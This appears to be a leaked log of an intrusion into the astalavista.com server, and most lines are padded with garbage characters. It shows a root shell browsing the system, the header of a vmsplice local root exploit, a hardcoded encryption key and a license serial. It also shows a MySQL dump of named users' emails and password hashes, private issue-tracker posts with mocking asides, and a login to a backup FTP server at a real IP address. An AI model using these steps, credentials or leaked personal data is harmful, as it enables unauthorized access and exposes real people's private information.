$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
% D, a$ S, H. }?>/ @) H+ C0 H/ l9 G1 R1 w9 Q! G
! u5 j" h0 H, f9 Z% @' K! k4 c/ ~
sh-3.2# cd ..: ]1 x# p- G* k
sh-3.2# cd com
4 W. b' |, H5 q9 }' Msh-3.2# ls -la
; y6 ~6 z+ p5 f3 \1 ~total 141208 {2 X, p/ x c
drwx–x–x 10 com com 4096 Apr 28 12:40 .
) l, T- M# r/ Y I% k9 ^" _8 D4 Wdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
3 l4 N- Y% v& b# P: ldrwx—— 2 com com 4096 Jun 4 04:04 backups% O! K3 z! |# U8 w3 K
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql/ G" f T. \3 }8 c+ M( \
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
3 y; p/ h! p; l" s8 q-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
8 J5 i9 n# ?, l2 J1 z( H-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout
1 E& {8 Z! K N( D2 {+ u0 d-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
: V" c& |% z) J; U- K# g! G-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc0 X: D7 ~, E2 E; Z( m6 c, F) D2 @
drwx–x–x 3 com com 4096 Jan 29 2008 domains/ v" r+ H: r" h4 K7 ^8 K
-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed
1 V( x; _8 C' `drwxrwx— 3 com mail 4096 Jan 6 19:24 imap
# L! {/ r0 H# M, ~& t& U0 f6 f-rw——- 1 com com 69 Nov 18 2008 .lesshst
! D3 N# e4 P, q& Q: I; V. Wdrwx—— 2 com com 4096 Sep 24 2007 mail# U# N8 t9 g$ ?2 S, S0 X g; k
-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
; k5 B0 F2 k& kdrwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp+ v9 E$ F9 @6 [% B3 L1 f5 n! Q3 a: w
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html- P9 c* B5 t+ H4 }( }# q
-rw-r—– 1 com mail 34 Sep 24 2007 .shadow9 M2 N! S* m/ }" h' Q
drwx—— 2 com com 4096 Aug 26 2008 .ssh
5 E4 `* ~* r8 ~1 F8 a+ C6 R-rwx—— 1 com com 8515 Feb 10 2008 t `4 P7 j( j0 P |4 T8 z& `
-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c9 n/ _+ K; W5 ?$ [( e6 N, U8 z
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp% e' ?7 C" x- E, K. R) X8 P
-rw-rw-r– 1 com com 617 May 20 2008 .toprc
2 Z! E Z/ E6 d( Z. L9 n S-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql% T% a/ R- |) a5 M' Z7 }9 Q3 G/ W
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo$ j+ t- C9 q, y" H" u5 ^; I
-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc; _4 i- L3 @! d3 R
0 D! p0 l1 M: y8 g% N* \sh-3.2# head t.c
( J# B$ ]/ [4 z6 o5 ]) u5 j/*
& G$ ~9 I |, B4 R& j/ |. Z* jessica_biel_naked_in_my_bed.c
8 u. G5 ]; _" o' Z0 W1 g% H*8 R: g* Q9 r0 |. T& O7 }
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.1 [" D6 ^! g4 m7 G
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
0 W% B- J' ]8 h% @. E. ^& d* m* Stejnak je to stare jak cyp a aj jakesyk rozbite.6 k. a; f# k/ L. F. L
*! D5 q" U( U/ ~: |% I
* Linux vmsplice Local Root Exploit
! { m1 U% ^ k* By qaaz8 B4 p; Y! @$ l+ f- [
*7 ~0 B6 B7 Q, g. s5 _- K- M+ W/ |
' [. R5 k' [4 F5 P: | s: lsh-3.2# cd /
# s: B1 C7 z* K2 q7 h0 I1 `sh-3.2# ls -la
# ]) ~) U! k: K9 `6 stotal 360" ~; y# o6 ~1 D& c) Q$ ?' |* I
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .
- x+ C) T, {: X9 S& Bdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..) H5 l% n& w, K- B
-rw——- 1 root root 10240 Jun 3 02:39 aquota.group
1 a. M4 y- G; b/ Q% M$ p# p-rw——- 1 root root 10240 Jun 3 02:39 aquota.user
" i. Z' x; D8 S-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db
5 H- ~* C0 Q0 s2 e6 F-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck. g: _4 w" u8 n) i! {$ o
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel9 E# O: _8 {; e& D# ?* z
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup4 R( x" X% y5 x* h, |' j5 A
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin/ O6 h: v: m1 @* w/ P
drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
+ n4 e2 _$ @9 O) L( Q2 {( mdrwxr-xr-x 11 root root 3620 Jun 3 02:43 dev6 d) g0 c1 E9 `" s6 m
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
9 N8 O" \: | w( G8 \. @5 `drwxr-xr-x 14 root root 4096 Mar 11 17:56 home3 B, U" _, {+ E7 |3 Q2 [7 t
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf, @. y7 a0 r: B. V4 ~" g. }1 A
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib3 [$ Z- ^$ r) R! i9 c& J7 L
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64
) Y# P' I" u6 K( G0 Fdrwx—— 2 root root 16384 Sep 11 2007 lost+found, `1 I1 v) s1 g, k1 X5 R; a3 M, S
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media
# Y6 ]) [( S v* O* ]# Jdrwxr-xr-x 2 root root 0 Jun 3 02:43 misc
" E) D. b& I; p5 jdrwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
- O& ^! w" I0 V# P8 ^9 A" {! j-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg
& p% z! b. M O% V) }drwxr-xr-x 2 root root 0 Jun 3 02:43 net
' s& S0 D0 W) a/ J, ]drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt& ~/ k; m6 f( _# J( f8 ~2 k
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc/ u$ ?, W2 o8 `/ Y3 q
drwxr-x— 15 root root 4096 Jun 4 08:40 root
7 o8 O( N; a/ F8 c: ^drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
( I4 f" `$ a, L& m1 _) s0 }drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux8 X* y, `+ j5 w
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
6 R9 p' {7 S- J! ~% w5 cdrwxr-xr-x 11 root root 0 Jun 3 02:42 sys
* v4 e" Q0 j) ldrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp# s" _6 p) W' r
drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr: @5 Q+ z0 h* h1 Q5 [' I
drwxr-xr-x 26 root root 4096 Jun 4 03:16 var: v- G. c2 V2 o8 L( ]2 u) {
% k4 J7 {; ~8 p
sh-3.2# cd opt) z" ]) Z& i$ o1 K
sh-3.2# ls -la
$ j4 l' N; A6 rtotal 20
3 x4 k6 d& c2 V8 O' g- sdrwxr-xr-x 3 root root 4096 Mar 11 17:56 .
1 ^5 s* b( Y( q- Bdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..1 r. F% L4 o) S5 n, v7 z- O
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws
/ o2 z- @* D: o# s( U
3 s3 J" c9 U: K3 j- k, { H3 E3 Rsh-3.2# cd lsws/
1 H2 U9 S; ?* y& ]sh-3.2# ls -la
6 r s% ^9 q: mtotal 108; s) N6 W! v6 W1 _
drwxr-xr-x 15 root root 4096 Mar 20 2008 .( t2 [% @- A$ j# s% g) Z
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
" ~) Y; Z) z5 X9 r4 W2 zdrwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons& c/ b$ n' x0 x7 _ t* [' I
drwxr-xr-x 13 root root 4096 May 29 15:10 admin
- |' J4 n; a) |+ ^3 rdrwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
+ a0 ]. @( g' A) M# u+ Qdrwxr-xr-x 2 root root 4096 May 29 15:10 bin& M1 U% x H# ^, j i/ h. B
drwx—— 4 apache apache 4096 Jun 3 02:43 conf
5 R* C+ [: E1 zdrwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT
3 [& Z9 Z& M: w/ p; kdrwxr-xr-x 2 root root 4096 Sep 15 2008 docs5 x: F& s) L( y: V( w
drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
' C- W1 U7 z0 s2 b8 G$ w7 edrwxr-xr-x 2 root root 4096 Sep 15 2008 lib2 J u9 J, q% E$ |9 f3 A3 l2 J
-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE( M, b7 i. ~$ L1 _: C% I
-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP. O( J! l- {" D; \0 f( a) ?1 [+ H u
-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL9 Y4 R& d: s+ c9 }3 n. e
-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP
2 B6 K' `( |1 m8 \; Y& P3 p) R5 r5 Tdrwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
W) h7 v" }6 c5 K# r5 l* Jdrwxr-xr-x 2 root root 4096 Mar 20 2008 php- b2 o! W3 G/ x$ ?. U9 U" t
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild
! a# F; [4 c% Z: D5 R9 F; ~* |( | Idrwxr-xr-x 3 root root 4096 Mar 20 2008 share* I0 t( \3 q! p
-rw-r–r– 1 root root 6 May 29 15:10 VERSION1 W9 j3 S* |: W0 U6 m- l* C/ D
6 V. r$ J5 q! n% } k5 U
sh-3.2# cd conf
c0 Y- o" d3 g8 ksh-3.2# ls -la3 q a% W7 K3 X
total 482 `; I% ~5 J3 p+ E
drwx—— 4 apache apache 4096 Jun 3 02:43 .
, @% X/ r; ~. r: z) Z. Vdrwxr-xr-x 15 root root 4096 Mar 20 2008 ..; C" `- g0 f; o! M
drwx—— 2 apache apache 4096 Mar 20 2008 cert* j$ w+ L4 q; N& A, K1 R
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml) h* R( d) l2 J8 v* I
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak$ r* v4 S6 E9 j# S$ M) o
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last, ~: E: L$ Z6 R r
-rw——- 1 apache apache 256 May 29 15:10 license.key; C/ w' Z! `1 d2 w7 O6 f6 u3 t
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
3 y" {& T3 t& |-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties
2 B8 M+ o! Q5 p7 C G-rw——- 1 apache apache 20 May 29 15:10 serial.no
( B9 q" r4 @5 F1 u( s0 I: B% Adrwx—— 2 apache apache 4096 Mar 20 2008 templates4 ~, N1 @* {# t9 l
& X- E7 e& G' b O' v; y
sh-3.2# cat serial.no( W; K$ L, q$ x' j
IbDl-oVsO-CKqL-wVRa
6 z: ?5 M+ u" ?/ `+ M$ X3 v* {
2 W* H( t$ z3 K0 }: Wsh-3.2# mysql# _6 {1 M4 ]9 N- V
Welcome to the MySQL monitor. Commands end with ; or \g.
: w8 H+ x# J+ g, k0 zYour MySQL connection id is 286844) q/ \0 T: \/ U4 e* n9 y- f
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
6 [5 v$ F c( n# s9 G
; T6 J9 o4 _, c4 J& U1 {Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
# [/ W+ C: O' [ G4 P. B, U, M
) ^8 y3 n: a, N1 M* b3 a8 X, c, o& D( Lmysql> show databases;; `4 Q" f. w' U% n; h
+———————–+& \; Q5 g8 Q: W5 F$ L9 J
| Database |! F H! E- ]/ V% j
+———————–+
0 w7 p5 J: \# H- ^3 z* z| information_schema |
/ R! g5 P% J4 A. g" R: O| astanet_ads |
3 j4 l9 b- A" c6 Y' l6 || astanet_mailing_lists |* ?4 {5 {5 Z, v. ~. h
| astanet_mediawiki |
! H' @+ M; s, E% q2 || astanet_membersystem |' r7 \4 E# y1 R, o0 `" ^
| com_contrexx |
! q% N! l" w3 W| com_contrexx2 |
# ]. ?3 a1 g$ R% Z| com_contrexx2_live |1 U' ~1 E) P& D8 t( L4 I- [% ?
| da_roundcube |
, X3 G) r8 w( _| dolphin |
, |" l% Y* I4 Q) [ e7 c| ideapool |" k2 y; g5 B# M0 K3 h- Z7 J. [
| mysql |8 P& @# |3 Z( `+ G( r. A
| test |
( w! R" F6 A' K h( L0 O; R; K" n/ o| yourmaster |
' @+ L3 o/ _! b5 c+———————–+
6 ?9 U0 D. w* w/ e3 V% P14 rows in set (0.00 sec)5 n9 P2 g+ @1 u; e' Z+ S
* K9 _- w) u: b! V1 |
mysql> use ideapool
: s# S8 z5 d" U; HDatabase changed* p3 @6 Q3 T7 Z
mysql> show tables;8 Z3 X# M& `1 ]1 K" l
+———————————–+- L- n" h, |( H9 K
| Tables_in_ideapool |; D5 d( t, {* h2 R
+———————————–+! b& D4 M* }1 m+ `# a a
| eventum_columns_to_display |
- } Z& R2 I- A8 h- B o+ l, n| eventum_custom_field |
4 S7 g# V0 ? A3 H8 _| eventum_custom_field_option |7 E" C+ i# V8 u4 }, m }2 Y
| eventum_custom_filter |
4 n1 m5 L' U: ^2 J) l7 C' A2 ~| eventum_customer_account_manager |' ?+ n' H }: u( y0 w+ z4 m
| eventum_customer_note |, n- h: e7 j5 F! r8 Y1 z7 ]+ e
| eventum_email_account |1 b& j' i& n- }& P8 c
| eventum_email_draft |
3 Q# n2 Y1 |7 }" W. u! N. l| eventum_email_draft_recipient |9 [' |' n1 H2 q4 C
| eventum_email_response |1 F/ I; D- I8 `
| eventum_faq |3 K3 Y2 R) o0 j, ^. Q
| eventum_faq_support_level |4 V* I. o1 y& r1 Y
| eventum_group |
7 Y, d9 l6 C2 ~; x2 x( m' H" w| eventum_history_type |
/ C7 ^6 } n$ Q: q| eventum_irc_notice |
, o- V) O) B0 e| eventum_issue |
0 c& F \8 ~+ w' d; N; k! d9 f! P' h| eventum_issue_association |
; a) M8 a; v! c6 o. M; E| eventum_issue_attachment |
# S% e' O, r) Z7 j. \, v7 X0 x( ^| eventum_issue_attachment_file |2 g+ t4 Z/ G Q: j
| eventum_issue_checkin |! C% M$ ^# i8 f1 P& p" q8 \
| eventum_issue_custom_field |
1 o6 R0 _* X" f( p5 ]7 @6 Q( D| eventum_issue_history |
9 E9 \+ a- m, B% ]! c| eventum_issue_quarantine |0 ^' N( q" L8 n5 H Z: O* q! n; ]
| eventum_issue_requirement | o6 c6 ~- r: s' u7 g, U3 y
| eventum_issue_user |) @$ C0 t* B; l6 i# p) k
| eventum_issue_user_replier |
& W& I& g) c4 a! p: l. d% L6 Z' t| eventum_link_filter |
: j J2 Q6 w1 B% f3 B; {| eventum_mail_queue |; F' P3 m" {0 ?. M2 I3 M+ o* R
| eventum_mail_queue_log |
7 a Q3 ^" \+ }3 d1 S$ b| eventum_news |
) o2 o# g. Z9 G3 J: `| eventum_note |7 [( d/ d% g' A
| eventum_phone_support |1 L4 c8 U5 H, C: `) } J
| eventum_project |# P5 I N' G' C$ h! W$ r
| eventum_project_category |9 }! S+ N/ w$ b8 q+ n% F7 C
| eventum_project_custom_field |
7 G( _: S! I: T7 F2 @+ L| eventum_project_email_response |
& V! Z) {- T* d4 T a1 [| eventum_project_field_display |
! B. u( @9 \# h) }3 e, f m- C| eventum_project_group |7 c2 A! s4 f& @" B! j" C
| eventum_project_link_filter |
5 g' M+ }+ q- E# S| eventum_project_news |
% n' Z0 A) M2 [$ ~. P7 v* X4 \ k| eventum_project_phone_category |: H3 A! O' _4 R, _+ ^- d
| eventum_project_priority |' L. I9 j- \7 m
| eventum_project_release |
4 g' c3 x4 G* Z& }9 l. q7 N| eventum_project_round_robin |
2 ~- ~5 S) T, Z- B| eventum_project_status |: }' Z- Q9 [& Y
| eventum_project_status_date |
8 }* X; \6 \8 w* n* n| eventum_project_user |
; I7 w% W/ t$ }" m| eventum_reminder_action |
9 F9 B( C3 Z6 \+ x% L| eventum_reminder_action_list |
: r/ x Y: H( c3 r3 \| eventum_reminder_action_type |' ~# r3 Y: l! B$ \
| eventum_reminder_field |/ }$ K- c( V- f4 w; x
| eventum_reminder_history |0 s/ P: m- G m* V' j1 y& H
| eventum_reminder_level |9 Z& m: Q: M, f! P
| eventum_reminder_level_condition |' u$ C# m1 [9 z2 \8 c7 Z ^& N
| eventum_reminder_operator |
, g2 y" ~5 C8 h| eventum_reminder_priority |
, r! J' ~( F7 p5 ]8 B| eventum_reminder_requirement |5 T5 u E' z+ G
| eventum_reminder_triggered_action |
g6 I4 v/ k/ y| eventum_resolution |0 ]. d5 G( v+ T7 G( E1 I
| eventum_round_robin_user |1 I7 C7 s3 L2 U. g; U3 z. ?
| eventum_search_profile |
( }" E# P+ D3 V/ O. g& V! a- N| eventum_status |
0 |9 Q6 I7 v- S% |) N$ D* f/ _| eventum_subscription |% F$ p% M! f0 i7 A. v1 A% Z) |' E
| eventum_subscription_type |
/ m0 C- J7 F4 Y* T| eventum_support_email |
0 C0 R3 z2 D; c3 G: j! `| eventum_support_email_body |+ L9 G2 j( t7 \. w9 _: `
| eventum_time_tracking |) x" [0 d# u% h9 j
| eventum_time_tracking_category |7 X) T% I0 k( z6 O
| eventum_user |
q% f: @, T, |$ \( k( G- B: }+———————————–++ Q% \+ V! a3 y! D( [
69 rows in set (0.00 sec)
/ W, Q9 f0 ~% t& \: |9 s7 J/ b2 F' u: _" [( \' [
mysql> describe eventum_user;
+ N+ ]2 W# U5 Y+————————-+——————+——+—–+———————+—————-+
9 B9 I6 [. _" S+ |: b1 `! b8 M0 i| Field | Type | Null | Key | Default | Extra |3 u; z) T8 _2 @ Y7 P5 @1 d( f
+————————-+——————+——+—–+———————+—————-+
$ d& p# i( C% z| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |, v# b3 l2 S8 S3 N# n5 |9 G8 v" [
| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |! d1 m: D. C) a' Y2 q
| usr_customer_id | int(11) unsigned | YES | | NULL | |
5 `) h) l# b9 Q u* }7 m H| usr_customer_contact_id | int(11) unsigned | YES | | NULL | | H2 ^! @ J& n9 d( d4 v" t
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |& u5 Y0 L: Q. f) N: Y8 N2 o
| usr_status | varchar(8) | NO | | active | |. m! [7 V4 ~- K2 R. T* H
| usr_password | varchar(32) | NO | | | |% S3 p$ ]2 V2 d M. o& m$ Q# P }
| usr_full_name | varchar(255) | NO | | | |/ v* p& j) \( ?5 ]4 e
| usr_email | varchar(255) | NO | UNI | | |
1 v: z# m7 b/ J/ l7 G. y| usr_preferences | longtext | YES | | NULL | |: A6 c5 J) j! ~% W7 U- V2 U5 l
| usr_sms_email | varchar(255) | YES | | NULL | |- I9 F; L5 f! x* z8 i0 m3 j5 a
| usr_clocked_in | tinyint(1) | YES | | 0 | |
* }8 Z$ A% o7 W4 K| usr_lang | varchar(5) | YES | | NULL | |
. |$ Z! R' p( b5 e6 f+————————-+——————+——+—–+———————+—————-+
; k/ E' Y" T) R7 ]% O& F13 rows in set (0.00 sec)' ~! q8 q2 p( m% R" j$ j9 x
2 x. |# D8 a6 H0 D3 @+ x' \! m
mysql> select usr_full_name,usr_email,usr_password from eventum_user;
. i+ J' ^* b0 D! c$ R7 s" ?% @+———————-+——————————-+———————————-+
7 j( U0 F8 D# h1 h| usr_full_name | usr_email | usr_password |3 ?( B; ~( z. g d! G6 Z L
+———————-+——————————-+———————————-+
+ m, r5 f1 `* |3 L% V; j1 f% s5 k| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |
( u4 f& B8 j4 y4 ]: @| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |
- s4 M: B7 b8 g+ F| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
0 ^0 o V8 f* [5 ? [! z1 a| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |/ F* ]( ]" ~* F' A$ c4 i- d
| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |+ a. |. f( U C6 Q/ S1 r) u$ |
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |' I5 H( i7 U5 W
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
- k( o m4 U: s8 U/ I9 r| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |" c- ^9 C5 J* V7 C Y6 a- J
| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
7 l. [+ S* n J* e" p$ g) i9 c| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
1 g, z5 @7 y @9 || ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |
0 a* T3 ?# ]5 o+ ]( s& Z| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |
3 D0 _- u% N7 d( f3 J| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |) G# W) t" F. u5 X& L0 [& [8 L
| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |! D5 t3 @7 m8 ]
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
/ [: i; Q5 z: j4 I$ k( F+———————-+——————————-+———————————-+% m( e! B, W5 f
15 rows in set (0.00 sec)
5 G- k- c6 H/ ]5 U9 \& c8 n& ]) N" `1 Y2 e: R
mysql> select iss_description from eventum_issue where iss_id = 43;3 S; C- ?1 M% x/ ^+ H6 E1 N7 E
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
% }: I* V( n& c4 f| iss_description
# z+ ^- y# Z/ V; J|; M$ Z) T# B9 u; y
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
% ~0 l" b1 r3 ^6 g5 K9 i| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be, g8 g- p6 M# T& Y/ z) E5 Q, y
connected for 90 mins… 120mins… so what i propose is something like:
; @8 k; G* @; A' @9 ^) d+ e链接标记[url]http://www.surfthechannel.com/[/url]
* @% V) d W1 t7 e3 l) Ksince they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system6 j- m0 L7 b9 B/ R
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
, e3 J! d1 _; b2 _) y! Q* L6 Abreak any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off9 ~) H$ h8 v/ G* D- [1 A+ {. J
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…7 J2 v! z% n5 }6 U: [
1 T1 Q: D1 l. b& p9 LWe could also put advertisement during play on the flash video player itself… extra $$…
+ m1 J& x [0 V4 H5 o+ m& l8 a0 l$ U* b( f; o- y
By sykadul |; |/ q/ t0 a+ n' R
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
6 l% u* q1 d4 _! i+ F% k# A1 row in set (0.00 sec)
& f% b3 }6 M8 F: o) a2 y
+ Q# U9 [4 g3 K2 S: ?& j4 n// Money and extra $$ is all they care about. remember that.! \) i/ q. C' q+ y3 H: C$ T( z
) \: \" V; h, f8 Wmysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
2 B$ i" B" z0 {4 S7 y2 [+————————+——————————————————————————————————————————————————————————————————————————————-+
9 t! o6 e( P8 f# N( |+ H* u| iss_summary | iss_description 5 v; L, {) i. B- g) \
|( ^7 [" \& S' w7 i3 \! u4 b
+————————+——————————————————————————————————————————————————————————————————————————————-+
8 j9 U B k* C, r: O* ~% ?| Forum for REAL EXPERTS | Hello,
/ f. I" |& u% z8 \* m: D' Q3 e
! o, t1 l6 G; r2 UIshtus and I,
& M( ]$ f6 b/ @5 {$ N( h6 n# c; t" w' r; v6 H8 J8 u; D# q: R! B
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
( g9 `6 s; c$ W; v2 O6 oONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
: H I5 o4 v6 ?4 F6 `3 [
4 {6 g5 i: h; J DOne example a friend of mine from coresecurity.com!/ n/ _/ f: K: T# H! A
6 [& q+ ^ G! }; u3 n* {$ V: a Y+ U
We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
5 B' x3 f3 U4 q, R, M( O+ c
% k% D. S" [% N5 @|7 Z# {+ d+ P0 F s" [$ I
+————————+——————————————————————————————————————————————————————————————————————————————+
3 e. l- J& D b1 row in set (0.00 sec)" q1 G7 W/ K: Z( I" {
$ |9 @4 i" I1 W// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs… V% z. B$ p5 K. J H/ H/ _& C
. S+ K! g4 Q7 F7 b7 K; Vmysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
3 @8 T/ u2 h1 T+——————+———————————————————————————————+9 M Y+ u, X: Z( B
| iss_summary | iss_description |, S/ L( a1 R; x" {7 }" g: h3 e+ |
+——————+———————————————————————————————+6 t8 K' b j+ s
| Website guidance | Virtual Girl which guides you trought the website.8 T6 t6 S0 ]& ?( X+ ^( ]
' N0 D4 t& O6 ^) wWe need a girl with who you can ( talk )!!!
H0 [0 P4 Z a4 }. AAlso for the News!
) x0 P B9 C; F i0 O# s: B1 \4 ySo my suggestion is a girl who read you the news loud if you like!
1 W) R( w- _; r# u" W1 m# _you can choose between read yourselfe or she read it for you or both!9 |9 ~, B9 R% {: C7 t4 B
& ^- }9 p0 K$ B( |- ]
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
7 b1 r u, O/ }( ?! I* Y& |0 e, u) y: [5 ~( E1 U2 L7 c
Have a look on the example girls!!
8 U$ x+ Q" E5 ~8 b! }7 c b* K3 c7 p+ f) W) q, S7 ? o, I; b, u- C# X6 _9 a
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]5 ?1 W( ]( \ Y3 T& C) l, h$ z8 n% S
% w$ W; g4 e4 e; Q" B! f
or that! d9 [( u A8 `) x9 R% [
* g, u8 P [, r( l+ M H7 I
链接标记[url]http://www.yellostrom.de/[/url]
! [: Z' g. b" `( K( N
" \$ U7 K2 i/ B4 F( D|+ m$ q: t- K) U& y5 D0 t3 q/ a' L
+——————+———————————————————————————————++ |$ ~6 H T$ L# C6 g& y2 F
1 row in set (0.00 sec)' c. J. k; o6 s4 d4 y
5 q; j3 z, _$ o* k0 H// ha ha.. K" N6 o( o2 I) F+ m8 y1 N
. c! V) r% E' m9 Tmysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;0 T/ I1 ^* e3 a7 H) M( B
+————————–+———————————————————————————————————–+) ]3 h4 R, C, m
| iss_summary | iss_description |" M+ e' t' q+ s% _4 S! g+ ~4 a
+————————–+———————————————————————————————————–+& L" I9 ~/ b$ P# N! v2 r
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |
% D" |7 m) x: B+————————–+———————————————————————————————————–+, a- u2 j3 Z; G1 t- B; x
1 row in set (0.00 sec)# [6 H. f7 j( Z0 h% D9 z; P
9 f- L0 g7 s' W b5 A# ^$ Q// LOL.- }/ R1 \0 o6 f Z6 M: O
; ]8 ?7 q7 h4 @) `2 d3 |- ^mysql> exit! h- Y0 v. T4 \; u6 C* M h
Bye# p2 ^; o: F$ T
" P7 [9 r6 D0 ^( w0 Osh-3.2# ftp 212.254.194.163; e+ n" |* @7 |+ T
Connected to 212.254.194.163.0 R. Y! h9 B1 f
220 BackupCOM_VW FTP server ready.
: r0 C' {, u. n3 I1 B s4 t* \: Z1 L504 AUTH: security mechanism ‘GSSAPI’ not supported. R, `; m% n7 b& r
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
* u' b' i0 g3 D+ \9 ^+ Z4 GKERBEROS_V4 rejected as an authentication type
7 ~! d) o# ^+ O* F% }# eName (212.254.194.163:root): astalavista.com
: H2 c) n" c! h. h331 Password required for astalavista.com.
2 L7 b9 x) I. T9 |- c$ pPassword:
. {# Q* J X8 B' @/ I q230 User astalavista.com logged in.
8 W0 h2 F' [6 a/ x5 sRemote system type is UNIX.4 H A' P% z+ R% O
Using binary mode to transfer files.
* a- S$ u! S& T! Z. W' Dftp> ls -la2 ]0 W. C; G k& f1 ^0 }+ \! M
227 Entering Passive Mode (212,254,194,163,2,188)( H a% M2 ~! Z- T! [
